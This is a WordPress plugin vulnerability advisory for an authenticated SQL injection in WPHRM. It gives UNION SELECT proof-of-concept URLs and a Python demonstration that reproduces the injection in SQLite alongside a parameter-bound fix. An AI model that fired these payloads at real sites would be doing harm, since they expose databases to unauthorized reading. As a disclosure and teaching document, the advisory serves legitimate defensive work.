WPHRM <= 1.0 - Authenticated SQL Injection


Description
The vulnerability allows an authenticated user with the employee role to inject SQL through the `id` parameter of the view_message page and the `employee_id` parameter of the view_employee page of the HR dashboard; the values are used in a query without sanitisation or parameter binding.
Proof of Concept
http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]-23+union+select+1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-

http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]
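The UNION payload in the first proof of concept works because the `id` parameter is spliced into the query text as-is: a negative id empties the legitimate result and the appended SELECT, padded to the same column count (eight here), lands its table listing in the column the page renders. The following is an added example, not code from the page or from the WPHRM plugin, that reproduces the mechanics against an in-memory SQLite database and shows the hardened form beside the vulnerable one. The table layout, column names and the eight-column width are constructed assumptions that only mirror the PoC; the payload is the PoC's, adapted to SQLite's `sqlite_master` in place of `INFORMATION_SCHEMA.TABLES`.

```python
import sqlite3

# Constructed sample schema standing in for the plugin's tables (an assumption,
# not the plugin's real schema). hr_messages has eight columns so that the
# PoC's "UNION SELECT 1,2,3,4,5,(...),7,8" lines up as it does in the advisory.
SCHEMA = """
CREATE TABLE hr_messages (
    id INTEGER PRIMARY KEY, sender INTEGER, recipient INTEGER, subject TEXT,
    body TEXT, folder TEXT, sent_at TEXT, is_read INTEGER
);
CREATE TABLE hr_employees (id INTEGER PRIMARY KEY, name TEXT, salary INTEGER);
INSERT INTO hr_messages VALUES (23, 1, 2, 'Hello', 'Welcome aboard', 'inbox', '2017-09-01', 0);
INSERT INTO hr_employees VALUES (1, 'Alice', 5000);
"""

# The advisory's payload for the id parameter, with sqlite_master replacing
# INFORMATION_SCHEMA.TABLES and group_concat(name, '<br>') replacing
# GROUP_CONCAT(table_name SEPARATOR 0x3c62723e).
PAYLOAD = ("-23 UNION SELECT 1,2,3,4,5,"
           "(SELECT group_concat(name, '<br>') FROM sqlite_master WHERE type='table'),"
           "7,8-- -")

COLUMNS = "id, sender, recipient, subject, body, folder, sent_at, is_read"


def fresh_db():
    """New in-memory database populated with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def view_message_vulnerable(conn, folder, message_id):
    """Unsafe pattern: request parameters are concatenated into the SQL text."""
    sql = (f"SELECT {COLUMNS} FROM hr_messages "
           f"WHERE folder = '{folder}' AND id = {message_id}")
    return conn.execute(sql).fetchall()


def view_message_safe(conn, folder, message_id):
    """Hardened form: the id is validated as an integer and both values are bound."""
    try:
        message_id = int(message_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    sql = f"SELECT {COLUMNS} FROM hr_messages WHERE folder = ? AND id = ?"
    return conn.execute(sql, (folder, message_id)).fetchall()


def leaked_tables(conn):
    """Run the PoC payload through the vulnerable handler and return the table
    names that surface in the sixth column (index 5), as the advisory's page would
    render them."""
    rows = view_message_vulnerable(conn, "inbox", PAYLOAD)
    return rows[0][5].split("<br>")


def rejects_payload(payload):
    """True if the hardened handler refuses the value instead of executing it."""
    try:
        view_message_safe(fresh_db(), "inbox", payload)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("legitimate:", view_message_vulnerable(fresh_db(), "inbox", "23"))
    print("leaked via UNION:", leaked_tables(fresh_db()))
    print("hardened handler rejects payload:", rejects_payload(PAYLOAD))
```

In a WordPress plugin the same fix is `absint()` (or `intval()`) on the request parameter followed by `$wpdb->prepare()` with a `%d` placeholder; the integer cast alone already makes the UNION text unrepresentable, and binding removes the string splice that the second PoC URL exploits through `employee_id` as well.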

Affects Plugin

Fixed in version 1.1

References

CVE 2017-14848
EXPLOITDB 42924
URL https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter David Hayes
Submitter Website https://wpshout.com
Submitter Twitter davidbhayes
Verified No
WPVDB ID 8929

Timeline

Publicly Published 2017-09-09
Added 2017-10-11
Last Updated 2017-10-11

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.